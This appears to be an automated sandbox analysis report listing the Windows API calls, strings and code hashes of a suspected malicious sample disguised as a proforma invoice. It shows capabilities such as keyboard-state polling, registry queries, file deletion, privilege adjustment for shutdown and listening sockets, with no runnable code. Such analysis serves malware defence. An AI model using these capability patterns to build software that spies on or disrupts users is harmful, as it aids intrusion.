                                                                                                                    • API String ID: 0-303758664
                                                                                                                    • Opcode ID: fc2ae018e024eca97284d92cc3c81209059b0263065a40dfa1e3e9840ed61a2d
                                                                                                                    • Instruction ID: 276810a246fbd7d00cadf4a4b50f6f6468d20f3d2487d9da44b378cd321a38b9
                                                                                                                    • Opcode Fuzzy Hash: fc2ae018e024eca97284d92cc3c81209059b0263065a40dfa1e3e9840ed61a2d
                                                                                                                    • Instruction Fuzzy Hash: 8D727075E20219DBDF14CF58C8447AEB7B5FF45320F1481AAE909EB290EB709DA1CB90
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 002BF113
                                                                                                                    • _wcscmp.LIBCMT ref: 002BF128
                                                                                                                    • _wcscmp.LIBCMT ref: 002BF13F
                                                                                                                      • Part of subcall function 002B4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 002B43A0
                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 002BF16E
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 002BF179
                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 002BF195
                                                                                                                    • _wcscmp.LIBCMT ref: 002BF1BC
                                                                                                                    • _wcscmp.LIBCMT ref: 002BF1D3
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 002BF1E5
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(00308920), ref: 002BF203
                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 002BF20D
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 002BF21A
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 002BF22C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 1824444939-438819550
                                                                                                                    • Opcode ID: b25b67560a35161e78da70f4222f61949b31db64f38841c5c312ba38e6c86d4b
                                                                                                                    • Instruction ID: e1e3d4a7d2d87ec3b66f11922ecbd4bcded80700487fd5792c3ad8cf2ff2b909
                                                                                                                    • Opcode Fuzzy Hash: b25b67560a35161e78da70f4222f61949b31db64f38841c5c312ba38e6c86d4b
                                                                                                                    • Instruction Fuzzy Hash: 1131183691121A7ACB50EF74ED49EEE77AC9F493A0F104172EC44E20A0DB30DE65CE58
                                                                                                                    APIs
                                                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 002BA20F
                                                                                                                    • __swprintf.LIBCMT ref: 002BA231
                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 002BA26E
                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 002BA293
                                                                                                                    • _memset.LIBCMT ref: 002BA2B2
                                                                                                                    • _wcsncpy.LIBCMT ref: 002BA2EE
                                                                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 002BA323
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 002BA32E
• RemoveDirectoryW.KERNEL32(?), ref: 002BA337
• CloseHandle.KERNEL32(00000000), ref: 002BA341
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
• String ID: :$\$\??\%s
• API String ID: 2733774712-3457252023
APIs
• GetKeyboardState.USER32(?), ref: 002B0097
• SetKeyboardState.USER32(?), ref: 002B0102
• GetAsyncKeyState.USER32(000000A0), ref: 002B0122
• GetKeyState.USER32(000000A0), ref: 002B0139
• GetAsyncKeyState.USER32(000000A1), ref: 002B0168
• GetKeyState.USER32(000000A1), ref: 002B0179
• GetAsyncKeyState.USER32(00000011), ref: 002B01A5
• GetKeyState.USER32(00000011), ref: 002B01B3
• GetAsyncKeyState.USER32(00000012), ref: 002B01DC
• GetKeyState.USER32(00000012), ref: 002B01EA
• GetAsyncKeyState.USER32(0000005B), ref: 002B0213
• GetKeyState.USER32(0000005B), ref: 002B0221
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
APIs
  • Part of subcall function 002D0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002CFDAD,?,?), ref: 002D0E31
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002D04AC
  • Part of subcall function 00259837: __itow.LIBCMT ref: 00259862
  • Part of subcall function 00259837: __swprintf.LIBCMT ref: 002598AC
• RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 002D054B
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 002D05E3
• RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 002D0822
• RegCloseKey.ADVAPI32(00000000), ref: 002D082F
Similarity
• API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
• String ID:
• API String ID: 1240663315-0
APIs
  • Part of subcall function 00259837: __itow.LIBCMT ref: 00259862
  • Part of subcall function 00259837: __swprintf.LIBCMT ref: 002598AC
• CoInitialize.OLE32 ref: 002C8403
• CoUninitialize.OLE32 ref: 002C840E
• CoCreateInstance.OLE32(?,00000000,00000017,002E2BEC,?), ref: 002C846E
• IIDFromString.OLE32(?,?), ref: 002C84E1
• VariantInit.OLEAUT32(?), ref: 002C857B
• VariantClear.OLEAUT32(?), ref: 002C85DC
Strings
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 834269672-1287834457
APIs
Similarity
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• String ID:
• API String ID: 1737998785-0
APIs
  • Part of subcall function 00254750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00254743,?,?,002537AE,?), ref: 00254770
  • Part of subcall function 002B4A31: GetFileAttributesW.KERNEL32(?,002B370B), ref: 002B4A32
• FindFirstFileW.KERNEL32(?,?), ref: 002B38A3
• DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 002B394B
• MoveFileW.KERNEL32(?,?), ref: 002B395E
• DeleteFileW.KERNEL32(?,?,?,?,?), ref: 002B397B
• FindNextFileW.KERNEL32(00000000,00000010), ref: 002B399D
• FindClose.KERNEL32(00000000,?,?,?,?), ref: 002B39B9
Strings
Similarity
• API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
• String ID: \*.*
• API String ID: 4002782344-1173974218
APIs
  • Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22
• FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 002BF440
• Sleep.KERNEL32(0000000A), ref: 002BF470
• _wcscmp.LIBCMT ref: 002BF484
• _wcscmp.LIBCMT ref: 002BF49F
• FindNextFileW.KERNEL32(?,?), ref: 002BF53D
• FindClose.KERNEL32(00000000), ref: 002BF553
Strings
Similarity
• API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
• String ID: *.*
• API String ID: 713712311-438819550
Strings
Similarity
• API ID: __itow__swprintf
• String ID: 3c&$_&
• API String ID: 674341424-1388094336
                                                                                                                    • Opcode ID: 815c600a12a24d6e41e9b29ae69a6a432efc84f3c89c057a86767679468f8341
                                                                                                                    • Instruction ID: 872db56d419d2680007cb578047565e32805193138434de91fb57a025421ab12
                                                                                                                    • Opcode Fuzzy Hash: 815c600a12a24d6e41e9b29ae69a6a432efc84f3c89c057a86767679468f8341
                                                                                                                    • Instruction Fuzzy Hash: E6229D716283019FCB24DF24C885B6EB7E4BF84314F14491DF89A97291DB71E9A8CF92
APIs
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
APIs
  • Part of subcall function 00254750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00254743,?,?,002537AE,?), ref: 00254770
  • Part of subcall function 002B4A31: GetFileAttributesW.KERNEL32(?,002B370B), ref: 002B4A32
• FindFirstFileW.KERNEL32(?,?), ref: 002B3B89
• DeleteFileW.KERNEL32(?,?,?,?), ref: 002B3BD9
• FindNextFileW.KERNEL32(00000000,00000010), ref: 002B3BEA
• FindClose.KERNEL32(00000000), ref: 002B3C01
• FindClose.KERNEL32(00000000), ref: 002B3C0A
Strings
Similarity
• API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
• String ID: \*.*
• API String ID: 2649000838-1173974218
APIs
  • Part of subcall function 002A87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002A882B
  • Part of subcall function 002A87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002A8858
  • Part of subcall function 002A87E1: GetLastError.KERNEL32 ref: 002A8865
• ExitWindowsEx.USER32(?,00000000), ref: 002B51F9
Strings
Similarity
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $@$SeShutdownPrivilege
• API String ID: 2234035333-194228
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 002C62DC
• WSAGetLastError.WSOCK32(00000000), ref: 002C62EB
• bind.WSOCK32(00000000,?,00000010), ref: 002C6307
• listen.WSOCK32(00000000,00000005), ref: 002C6316
• WSAGetLastError.WSOCK32(00000000), ref: 002C6330
• closesocket.WSOCK32(00000000,00000000), ref: 002C6344
Similarity
• API ID: ErrorLast$bindclosesocketlistensocket
• String ID:
• API String ID: 1279440585-0
APIs
  • Part of subcall function 00270DB6: std::exception::exception.LIBCMT ref: 00270DEC
  • Part of subcall function 00270DB6: __CxxThrowException@8.LIBCMT ref: 00270E01
• _memmove.LIBCMT ref: 002A0258
• _memmove.LIBCMT ref: 002A036D
• _memmove.LIBCMT ref: 002A0414
Similarity
• API ID: _memmove$Exception@8Throwstd::exception::exception
• String ID:
• API String ID: 1300846289-0
APIs
  • Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623
• DefDlgProcW.USER32(?,?,?,?,?), ref: 002519FA
• GetSysColor.USER32(0000000F), ref: 00251A4E
• SetBkColor.GDI32(?,00000000), ref: 00251A61
  • Part of subcall function 00251290: DefDlgProcW.USER32(?,00000020,?), ref: 002512D8
Similarity
• API ID: ColorProc$LongWindow
• String ID:
• API String ID: 3744519093-0
APIs
  • Part of subcall function 002C7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 002C7DB6
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 002C679E
• WSAGetLastError.WSOCK32(00000000), ref: 002C67C7
• bind.WSOCK32(00000000,?,00000010), ref: 002C6800
• WSAGetLastError.WSOCK32(00000000), ref: 002C680D
• closesocket.WSOCK32(00000000,00000000), ref: 002C6821
Similarity
• API ID: ErrorLast$bindclosesocketinet_addrsocket
• String ID:
• API String ID: 99427753-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
APIs
• GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002A80C0
• GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002A80CA
• GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 002A80D9
• HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 002A80E0
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 002A80F6
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
Strings
Similarity
• API ID:
• String ID: Dd1$Dd1$Dd1$Dd1$Variable must be of type 'Object'.
• API String ID: 0-908346732
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00254AD0), ref: 00254B45
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00254B57
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetNativeSystemInfo$kernel32.dll
• API String ID: 2574300362-192647395
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 002CEE3D
• Process32FirstW.KERNEL32(00000000,?), ref: 002CEE4B
  • Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22
• Process32NextW.KERNEL32(00000000,?), ref: 002CEF0B
• CloseHandle.KERNEL32(00000000,?,?,?), ref: 002CEF1A
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
• String ID:
• API String ID: 2576544623-0
APIs
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 002AE628
Strings
Similarity
• API ID: lstrlen
• String ID: ($|
• API String ID: 1659193697-1631851259
APIs
• InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,002C180A,00000000), ref: 002C23E1
• InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 002C2418
Similarity
• API ID: Internet$AvailableDataFileQueryRead
• String ID:
• API String ID: 599397726-0
APIs
• SetErrorMode.KERNEL32(00000001), ref: 002BB343
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 002BB39D
• SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 002BB3EA
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID:
• API String ID: 1682464887-0
APIs
  • Part of subcall function 00270DB6: std::exception::exception.LIBCMT ref: 00270DEC
  • Part of subcall function 00270DB6: __CxxThrowException@8.LIBCMT ref: 00270E01
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002A882B
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002A8858
• GetLastError.KERNEL32 ref: 002A8865
                                                                                                                    Similarity
                                                                                                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1922334811-0
                                                                                                                    • Opcode ID: 84bfb98c1d5d5102b9d7d5ba55368b1f9743e193f055693acf2da421999e41c6
                                                                                                                    • Instruction ID: 26276d54076423fccbd55e9971b00263dfe90319286792bef382b17cf200593d
                                                                                                                    • Opcode Fuzzy Hash: 84bfb98c1d5d5102b9d7d5ba55368b1f9743e193f055693acf2da421999e41c6
                                                                                                                    • Instruction Fuzzy Hash: 791190B1824305AFD718DF94EC85D2BB7E8EB05310B10852EE45683201DE30AC508B60
                                                                                                                    APIs
                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 002A8774
                                                                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 002A878B
                                                                                                                    • FreeSid.ADVAPI32(?), ref: 002A879B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3429775523-0
                                                                                                                    • Opcode ID: 57614fe386a768636e77bda44c71c57c7af39e1575a08513ff256cd561da8781
                                                                                                                    • Instruction ID: e6f7b9cd0ca00153206445c60cc466addeab658550223b8a4e8e5a8438aeb5b6
                                                                                                                    • Opcode Fuzzy Hash: 57614fe386a768636e77bda44c71c57c7af39e1575a08513ff256cd561da8781
                                                                                                                    • Instruction Fuzzy Hash: DDF04975E1130DBFDF00DFF4DD89AAEBBBCEF08201F5044A9A902E3281E6716A048B54
                                                                                                                    APIs
                                                                                                                    • __time64.LIBCMT ref: 002B889B
                                                                                                                      • Part of subcall function 0027520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,002B8F6E,00000000,?,?,?,?,002B911F,00000000,?), ref: 00275213
                                                                                                                      • Part of subcall function 0027520A: __aulldiv.LIBCMT ref: 00275233
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                    • String ID: 0e1
                                                                                                                    • API String ID: 2893107130-2457772890
                                                                                                                    • Opcode ID: fe1717a292013ecb0a1a0eda30628b382b7a6c03e334d3feb6a8bdf121d1f731
                                                                                                                    • Instruction ID: d2adad1343f4702ec73448355393f2529ed2112b5a3250b2dbaa2d79318c1689
                                                                                                                    • Opcode Fuzzy Hash: fe1717a292013ecb0a1a0eda30628b382b7a6c03e334d3feb6a8bdf121d1f731
                                                                                                                    • Instruction Fuzzy Hash: D521B4326355118BC729CF65D841A92B3E5EFA9311F688E6CD0F9CB2C0CA74B905CB54
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 002BC6FB
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 002BC72B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2295610775-0
                                                                                                                    • Opcode ID: a4431e9abfdecdadb9004df9c791f8803d605a03a49c7a2ae6b26f2ef4b7363d
                                                                                                                    • Instruction ID: 6f048f1682c3480c722b352e4dc348f6b35958dd19b9c907f277fff713bc2a18
                                                                                                                    • Opcode Fuzzy Hash: a4431e9abfdecdadb9004df9c791f8803d605a03a49c7a2ae6b26f2ef4b7363d
                                                                                                                    • Instruction Fuzzy Hash: AB11A5716106009FDB10DF29D84996AF7E8FF45321F14851EF8A5CB291DB30AC15CF85
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,002C9468,?,002DFB84,?), ref: 002BA097
                                                                                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,002C9468,?,002DFB84,?), ref: 002BA0A9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3479602957-0
                                                                                                                    • Opcode ID: 2d1e6a2a29f15fa3bf9bf9f4455db4b9bc8340d516fa4e6f34ec4bfb79edc928
                                                                                                                    • Instruction ID: 166cf30e6fee2c024257edabadf368098bc01d44b4ff180a5e531c7eab4babb9
                                                                                                                    • Opcode Fuzzy Hash: 2d1e6a2a29f15fa3bf9bf9f4455db4b9bc8340d516fa4e6f34ec4bfb79edc928
                                                                                                                    • Instruction Fuzzy Hash: 9BF0E23552622DBBDB60AFA4DC48FEA736CBF08361F0081A6FC1AD6180C6309910CBA1
                                                                                                                    APIs
                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002A8309), ref: 002A81E0
                                                                                                                    • CloseHandle.KERNEL32(?,?,002A8309), ref: 002A81F2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 81990902-0
                                                                                                                    • Opcode ID: bdba615e56c7b45316b7a1434ad86dbc76d78506c693992ed4ee4e68d06087c5
                                                                                                                    • Instruction ID: 454b57e4f94632c6f68ffbf89c43cef62e4fb9c57fcd5de3b76bb9e13c2e1eff
                                                                                                                    • Opcode Fuzzy Hash: bdba615e56c7b45316b7a1434ad86dbc76d78506c693992ed4ee4e68d06087c5
                                                                                                                    • Instruction Fuzzy Hash: FBE04632021A10EFE7612B20FC08D737BEAEB04310714C82AB8AA80430CB72ACA0DB10
                                                                                                                    APIs
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00278D57,?,?,?,00000001), ref: 0027A15A
                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0027A163
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3192549508-0
                                                                                                                    • Opcode ID: 632a21d1779542346ac6fef68a0c88734ba6e5b3ac3630f622a34311d953dc12
                                                                                                                    • Instruction ID: 9ff05b1e8d1e85512cb73e41824b74a20cfe9277360aed6246e3edda3dc73465
                                                                                                                    • Opcode Fuzzy Hash: 632a21d1779542346ac6fef68a0c88734ba6e5b3ac3630f622a34311d953dc12
                                                                                                                    • Instruction Fuzzy Hash: 99B09231455248ABCAC02B95FD0DB883F68EB44AA2F4180A2FE0E84060CB6258508A99
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fa5986d9bdd44b58e5de6d31e182df707e97d2fa45c508003d4ba0cf8e1f78dc
                                                                                                                    • Instruction ID: 49591ba1d1aca478905cdf12969bebd3b0280bf53db71bcffd088dd4a5914a89
                                                                                                                    • Opcode Fuzzy Hash: fa5986d9bdd44b58e5de6d31e182df707e97d2fa45c508003d4ba0cf8e1f78dc
                                                                                                                    • Instruction Fuzzy Hash: A2320222D79F814DD7639A34E976335A248AFB73C8F15D73BE819B99A5EB38C4834100
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
